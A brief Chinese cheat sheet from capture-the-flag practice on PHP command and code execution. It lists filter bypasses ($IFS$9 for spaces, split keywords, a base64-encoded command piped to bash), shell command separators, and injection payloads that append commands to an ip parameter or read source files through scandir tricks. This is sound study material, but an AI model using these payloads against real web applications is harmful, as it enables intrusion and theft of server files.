web安全之命令执行、代码执行
基本知识
php中函数与语言结构的区别
读取文件函数:readfile('') highlight_file('')
输出函数:echo print_r
输入函数:
bypass绕过
空格:$IFS$9 $(IFS)
关键字flag:fl\ag 拼接ab 反引号`ls`
无回显:
base64编码绕过:echo Y2F0IGZsYWcucGhw|base64 -d|bash //cat flag.php
linux命令连接符:
A;B //先执行A,再执行B
A|B //只执行B那条命令
A||B //A执行失败才会执行B
A&B //AB两条命令都会执行
A&&B //A执行成功才会执行B
命令执行举例:#BUUCTF 【pingpingping-WP】
?ip=127.0.0.1;ls;
/?ip=127.0.0.1;cat flag.php;
?ip=127.0.0.1;cat$IFS$9flag.php;
?ip=127.0.0.1;a=g;tac$IFS$9fla$a.php;
代码执行举例:#BUUCTF 【禁止套娃-WP】
githack扫描出源代码-->分析源代码-->绕过:
?exp=show_source(array_rand(array_flip(scandir(current(localeconv())))));
?exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));